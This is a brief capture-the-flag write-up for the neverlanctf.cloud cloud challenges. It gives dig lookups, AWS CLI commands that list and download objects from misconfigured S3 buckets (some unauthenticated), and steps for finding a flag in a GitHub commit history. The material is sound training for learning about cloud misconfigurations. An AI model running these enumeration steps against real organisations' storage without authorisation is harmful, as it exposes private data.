# neverlanctf.cloud

## level1
http://neverlanctf.cloud/

solve with:

`dig neverlanctf.cloud`

`aws s3 ls  s3://neverlanctf.cloud/ --no-sign-request --region us-west-2`

## level2
http://level2-e8a0ed21fc6fcc73b90895b4a2cdb120dca.neverlanctf.cloud

`dig level2-e8a0ed21fc6fcc73b90895b4a2cdb120dca.neverlanctf.cloud`

```aws s3 ls  s3://level2-e8a0ed21fc6fcc73b90895b4a2cdb120dca.neverlanctf.cloud/ --no-sign-request --region us-west-2

An error occurred (AccessDenied) when calling the ListObjectsV2 operation: Access Denied

$ aws configure
AWS Access Key ID [****************5UCQ]: xxxx
AWS Secret Access Key [****************sYK6]: xxxx
Default region name [us-west-2]: 
Default output format [None]: 

$aws s3 ls  s3://level2-e8a0ed21fc6fcc73b90895b4a2cdb120dca.neverlanctf.cloud/ --region us-west-2
2019-01-31 07:54:54       1217 flag-3535639b42edf388138e308aaf62c28c.html
2019-01-31 07:52:15       1106 index.html
```

Browse to: http://level2-e8a0ed21fc6fcc73b90895b4a2cdb120dca.neverlanctf.cloud/flag-3535639b42edf388138e308aaf62c28c.html

or 

`$aws s3 cp s3://level2-e8a0ed21fc6fcc73b90895b4a2cdb120dca.neverlanctf.cloud/flag-3535639b42edf388138e308aaf62c28c.html . --region us-west-2`


## level3

start at http://level3-8d8b789d9d480691b6115329da648c4982ef090d14a81f6306a6b79.neverlanctf.cloud/

`dig level3-8d8b789d9d480691b6115329da648c4982ef090d14a81f6306a6b79.neverlanctf.cloud`

- ah its google storage this time
- read the html
- go to github
- browse commit history
- find the real flag in commit
- https://github.com/neverlanctfcloud/level3/commit/b853e9c1af29a8ea7b0d0da9c9b6223e37c3b193
